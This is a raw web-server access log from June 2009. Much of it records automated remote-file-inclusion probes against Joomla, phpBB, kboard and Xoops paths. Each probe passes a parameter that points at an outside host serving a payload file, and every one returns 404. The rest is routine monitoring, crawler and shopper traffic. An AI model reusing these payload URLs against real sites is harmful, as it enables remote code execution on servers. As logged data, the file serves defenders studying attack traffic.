75.145.152.113 - - [16/Jun/2009:00:52:46 -0400] "GET /logs/access_log.Q108112300%20%20//bbs/skin/zero_vote/error.php//skin/zero_vote/error.php?dir=http://food114.tv/banner/shirohige/fxid.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
77.240.235.130 - - [16/Jun/2009:00:52:54 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
218.249.36.194 - - [16/Jun/2009:00:53:16 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://aboutav.com//back/test.txt? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
218.249.36.194 - - [16/Jun/2009:00:53:16 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://aboutav.com//back/test.txt? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
209.59.12.99 - - [16/Jun/2009:00:53:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.240.235.130 - - [16/Jun/2009:00:53:22 -0400] "GET /logs/access_log.Q109051700//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
72.82.228.83 - - [16/Jun/2009:00:53:30 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:00:53:33 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:00:53:33 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.98.209.71 - - [16/Jun/2009:00:53:43 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:00:53:47 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://aboutav.com//id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:00:53:47 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:00:53:47 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://aboutav.com//id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:00:54:03 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:00:54:03 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:00:54:03 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:00:54:12 -0400] "GET /logs/access_log.Q109060900%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:00:54:14 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:00:54:14 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:00:54:14 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:00:54:28 -0400] "GET /logs/access_log.Q109060900%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:55:33 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:55:33 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:55:33 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:55:33 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:55:34 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:55:34 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:55:34 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:55:34 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:55:36 -0400] "GET /logs/access_log.Q109053000%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:55:36 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:55:36 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:00:55:36 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:00:55:36 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://aboutav.com//id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:00:55:36 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://aboutav.com//id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:55:43 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:55:43 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:55:44 -0400] "GET /logs/access_log.Q109053000%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:55:53 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:55:54 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:55:54 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:56:08 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:56:12 -0400] "GET /logs/access_log.Q109052500%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:56:20 -0400] "GET /logs/access_log.Q109052500%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:56:56 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:56:56 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:56:56 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
83.98.209.71 - - [16/Jun/2009:00:57:05 -0400] "GET /logs/access_log.Q109060600%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:57:10 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:00:57:44 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_custompages&cpage=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:00:57:44 -0400] "GET //index.php?option=com_custompages&cpage=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:00:57:45 -0400] "GET /logs/access_log.Q109060900//index.php?option=com_custompages&cpage=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:00:57:47 -0400] "GET /logs//index.php?option=com_custompages&cpage=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:00:57:48 -0400] "GET /logs//index.php?option=com_custompages&cpage=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:00:57:48 -0400] "GET //index.php?option=com_custompages&cpage=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:00:57:48 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_custompages&cpage=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
38.99.44.103 - - [16/Jun/2009:00:57:58 -0400] "GET /logs/access_log.Q108072100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
199.120.90.222 - - [16/Jun/2009:00:57:59 -0400] "GET /logs/access_log.Q109060900//index.php?option=com_custompages&cpage=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jun/2009:00:58:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.249.36.194 - - [16/Jun/2009:00:59:49 -0400] "GET /logs/access_log.Q109050300%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://aboutav.com//id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
81.223.126.82 - - [16/Jun/2009:01:00:43 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
81.223.126.82 - - [16/Jun/2009:01:00:43 -0400] "GET /logs/access_log.Q109052900//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
81.223.126.82 - - [16/Jun/2009:01:01:06 -0400] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
38.99.44.103 - - [16/Jun/2009:01:01:11 -0400] "GET /logs/access_log.Q108062500 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
66.249.71.14 - - [16/Jun/2009:01:01:12 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L004A904F2582E600C3BE071+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
81.223.126.82 - - [16/Jun/2009:01:01:31 -0400] "GET /logs/access_log.Q109052800//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.105.207.244 - - [16/Jun/2009:01:02:27 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
200.105.207.244 - - [16/Jun/2009:01:02:27 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
200.105.207.244 - - [16/Jun/2009:01:02:27 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
214.1.240.252 - - [16/Jun/2009:01:03:47 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:03:47 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:03:52 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:03:52 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:04:03 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical%20aspirator HTTP/1.1" 200 46791 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:04:05 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical aspirator" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:04:05 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical aspirator" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:04:06 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical aspirator" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:04:06 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical aspirator" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:04:06 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical aspirator" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:04:06 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical aspirator" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:04:07 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical aspirator" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:04:07 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical aspirator" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:04:07 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical aspirator" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
209.59.12.99 - - [16/Jun/2009:01:04:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
214.1.240.252 - - [16/Jun/2009:01:04:07 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical aspirator" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:04:07 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical aspirator" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:04:08 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical aspirator" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:04:08 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical aspirator" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:04:08 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical aspirator" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:04:08 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical aspirator" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:04:09 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):surgical aspirator" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
